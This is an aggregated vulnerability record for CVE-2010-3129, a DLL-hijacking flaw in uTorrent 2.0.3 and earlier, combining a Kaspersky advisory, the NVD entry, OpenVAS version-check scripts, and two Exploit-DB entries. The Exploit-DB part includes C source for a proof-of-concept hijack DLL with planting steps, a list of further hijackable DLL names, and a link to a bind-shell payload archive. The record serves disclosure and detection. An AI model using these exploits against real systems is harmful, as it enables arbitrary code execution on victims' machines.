Search...

KLA10424ACE vulnerability in uTorrent

2010-08-26T00:00:00

ID KLA10424
Type kaspersky
Reporter Kaspersky Lab
Modified 2020-06-18T00:00:00

Description

Detect date:

08/26/2010

Severity:

Critical

Description:

An untrusted path vulnerability was found in uTorrent. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a library hijack.

Affected products:

uTorrent versions 2.0.3 and earlier

Solution:

Update to latest version
uTorrent

Impacts:

ACE

Related products:

uTorrent

CVE-IDS:

CVE-2010-31299.3Critical

Exploitation:

The following public exploits exists for this vulnerability:

JSON Vulners Source

Initial Source

{"id": "KLA10424", "bulletinFamily": "info", "title": "\r KLA10424ACE vulnerability in uTorrent ", "description": "### *Detect date*:\n08/26/2010\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn untrusted path vulnerability was found in uTorrent. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a library hijack.\n\n### *Affected products*:\nuTorrent versions 2.0.3 and earlier\n\n### *Solution*:\nUpdate to latest version \n[uTorrent](<http://www.utorrent.com/>)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[uTorrent](<https://threats.kaspersky.com/en/product/uTorrent/>)\n\n### *CVE-IDS*:\n[CVE-2010-3129](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3129>)9.3Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "published": "2010-08-26T00:00:00", "modified": "2020-06-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10424", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2010-3129"], "type": "kaspersky", "lastseen": "2020-09-02T11:53:11", "edition": 41, "viewCount": 77, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3129"]}, {"type": "exploitdb", "idList": ["EDB-ID:14726", "EDB-ID:14748"]}, {"type": "openvas", "idList": ["OPENVAS:902240", "OPENVAS:1361412562310902240"]}], "modified": "2020-09-02T11:53:11", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-09-02T11:53:11", "rev": 2}, "vulnersScore": 6.9}, "scheme": null, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:45:01", "description": "Untrusted search path vulnerability in uTorrent 2.0.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse plugin_dll.dll, userenv.dll, shfolder.dll, dnsapi.dll, dwmapi.dll, iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, or rpcrtremote.dll that is located in the same folder as a .torrent or .btsearch file.\nPer: http://cwe.mitre.org/data/definitions/426.html\r\n\r\nCWE-426 - 'Untrusted Search Path Vulnerability'", "edition": 4, "cvss3": {}, "published": "2010-08-26T18:36:00", "title": "CVE-2010-3129", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3129"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:utorrent:utorrent:1.7.2", "cpe:/a:utorrent:utorrent:1.7", "cpe:/a:utorrent:utorrent:2.0.2", "cpe:/a:utorrent:utorrent:1.1.3", "cpe:/a:utorrent:utorrent:1.1.6", "cpe:/a:utorrent:utorrent:1.8", "cpe:/a:utorrent:utorrent:1.8.1", "cpe:/a:utorrent:utorrent:1.1.4", "cpe:/a:utorrent:utorrent:1.7.6", "cpe:/a:utorrent:utorrent:1.7.5", "cpe:/a:utorrent:utorrent:1.1.1", "cpe:/a:utorrent:utorrent:1.8.2", "cpe:/a:utorrent:utorrent:2.0", "cpe:/a:utorrent:utorrent:1.8.4", "cpe:/a:utorrent:utorrent:1.8.5", "cpe:/a:utorrent:utorrent:2.0.3", "cpe:/a:utorrent:utorrent:2.0.1", "cpe:/a:utorrent:utorrent:1.1.7", "cpe:/a:utorrent:utorrent:1.2", "cpe:/a:utorrent:utorrent:1.2.2", "cpe:/a:utorrent:utorrent:1.7.4", "cpe:/a:utorrent:utorrent:1.1.5", "cpe:/a:utorrent:utorrent:1.7.1", "cpe:/a:utorrent:utorrent:1.8.3", "cpe:/a:utorrent:utorrent:1.2.1"], "id": "CVE-2010-3129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3129", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:utorrent:utorrent:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:utorrent:utorrent:2.0.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-27T19:23:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3129"], "description": "uTorrent on this host is prone to insecure library\n loading vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2010-09-01T00:00:00", "id": "OPENVAS:1361412562310902240", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902240", "type": "openvas", "title": "uTorrent File Opening Insecure Library Loading Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# uTorrent File Opening Insecure Library Loading Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902240\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-09-01 09:34:36 +0200 (Wed, 01 Sep 2010)\");\n script_cve_id(\"CVE-2010-3129\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"uTorrent File Opening Insecure Library Loading Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41051\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14726/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2164\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_utorrent_detect_portable_win.nasl\");\n script_mandatory_keys(\"utorrent/win/version\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the application insecurely loading certain libraries\n from the current working directory, which could allow attackers to execute\n arbitrary code by tricking a user into opening a Torrent file.\");\n script_tag(name:\"solution\", value:\"Upgrade to uTorrent version 2.0.4 or later.\");\n script_tag(name:\"summary\", value:\"uTorrent on this host is prone to insecure library\n loading vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attackers to execute arbitrary code and\n conduct DLL hijacking attacks.\");\n script_tag(name:\"affected\", value:\"uTorrent version 2.0.3 and prior\");\n\n script_xref(name:\"URL\", value:\"http://www.utorrent.com/downloads\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\n\nuTorrentVer = get_kb_item(\"utorrent/win/version\");\n\nif(!uTorrentVer) exit(0);\n\nif(version_is_less_equal(version:uTorrentVer, test_version:\"2.0.3\")) {\n report = report_fixed_ver(installed_version:uTorrentVer, vulnerable_range:\"Less than or equal to 2.0.3\");\n security_message(port: 0, data: report);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3129"], "description": "This host is installed with uTorrent and is prone to insecure library\n loading vulnerability.", "modified": "2017-02-23T00:00:00", "published": "2010-09-01T00:00:00", "id": "OPENVAS:902240", "href": "http://plugins.openvas.org/nasl.php?oid=902240", "type": "openvas", "title": "uTorrent File Opening Insecure Library Loading Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_utorrent_insecure_lib_load_vuln.nasl 5401 2017-02-23 09:46:07Z teissa $\n#\n# uTorrent File Opening Insecure Library Loading Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attackers to execute arbitrary code and\n conduct DLL hijacking attacks.\n Impact Level: Application.\";\ntag_affected = \"uTorrent version 2.0.3 and prior\";\n\ntag_insight = \"The flaw is due to the application insecurely loading certain librairies\n from the current working directory, which could allow attackers to execute\n arbitrary code by tricking a user into opening a Torrent file.\";\ntag_solution = \"Upgrade to uTorrent version 2.0.4 or later,\n For updates refer to http://www.utorrent.com/downloads\";\ntag_summary = \"This host is installed with uTorrent and is prone to insecure library\n loading vulnerability.\";\n\nif(description)\n{\n script_id(902240);\n script_version(\"$Revision: 5401 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-23 10:46:07 +0100 (Thu, 23 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-01 09:34:36 +0200 (Wed, 01 Sep 2010)\");\n script_cve_id(\"CVE-2010-3129\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"uTorrent File Opening Insecure Library Loading Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41051\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14726/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2164\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\uTorrent\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nutName = registry_get_sz(key:key, item:\"DisplayIcon\");\n\n## Check the name of the application\nif(\"uTorrent\" >< utName)\n{\n ## Check for utorrent\n utVer = registry_get_sz(key: key, item:\"DisplayVersion\");\n if(utVer)\n {\n ## Check for uTorrent version 2.0.3 and prior\n if(version_is_less_equal(version:utVer, test_version:\"2.0.3\")){\n security_message(0) ;\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T20:26:21", "description": "uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll). CVE-2010-3129. Local exploit for windows platform", "published": "2010-08-24T00:00:00", "type": "exploitdb", "title": "uTorrent <= 2.0.3 DLL Hijacking Exploit plugin_dll.dll", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3129"], "modified": "2010-08-24T00:00:00", "id": "EDB-ID:14726", "href": "https://www.exploit-db.com/exploits/14726/", "sourceData": "/*\r\nExploit Title: uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)\r\nDate: 24/08/2010\r\nAuthor: TheLeader\r\nEmail: gsog2009 [a7] hotmail [d0t] com\r\nSoftware Link: http://www.utorrent.com/downloads\r\nVersion: 2.0.3 and prior\r\nTested on: Windows 7 x86 (6.1.7600)\r\n\r\nCompile and rename to plugin_dll.dll, create a file in the same dir with one of the following extensions:\r\n.torrent / .btsearch\r\n\r\nDouble click & watch a nice calculator pop =]\r\n\r\nA nice post about DLL Hijacking by Yam Mesicka (hebrew):\r\nhttp://www.mesicka.com/dll-hijacking-windows-hd-moore/\r\n\r\n@avivra: glad to provide entertainment for you guys =D\r\n\r\n*Even more shouts* to all the great guys at forums.hacking.org.il\r\n*/\r\n\r\n#include <windows.h>\r\n#define DLLIMPORT __declspec (dllexport)\r\n\r\nDLLIMPORT void hook_startup() { evil(); }\r\n\r\nint evil()\r\n{\r\n WinExec(\"calc\", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14726/"}, {"lastseen": "2016-02-01T20:29:27", "description": "uTorrent DLL Hijacking Vulnerabilities. Local exploit for windows platform", "published": "2010-08-25T00:00:00", "type": "exploitdb", "title": "uTorrent - DLL Hijacking Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3129"], "modified": "2010-08-25T00:00:00", "id": "EDB-ID:14748", "href": "https://www.exploit-db.com/exploits/14748/", "sourceData": "###########################################################################\r\n#\r\n# Title: \tuTorrent <=2.0.3 Dll Hijacking Local Exploits\r\n# By:\t\tDr_IDE\r\n# Tested:\tWindows 7RC\r\n# Note:\t\tThese are additional DLL's with unsafe Load Paths\r\n# Reference:\thttp://www.exploit-db.com/exploits/14726/\r\n#\r\n############################################################################\r\n\r\nIf the payload .DLL file is renamed to any of these files and placed in the \r\nutorrent.exe directory, the payload will be executed with users' credentials.\r\n\r\n\t-userenv.dll\r\n\r\n\t-shfolder.dll\r\n\t\r\n\t-dnsapi.dll\r\n\r\n\t-dwmapi.dll\r\n\r\n\t-iphlpapi.dll\r\n\r\n\t-dhcpcsvc.dll\r\n\r\n\t-dhcpcsvc6.dll\r\n\r\n\t-rpcrtremote.dll\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz)\r\n\r\n#[pocoftheday.blogspot.com]", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14748/"}]}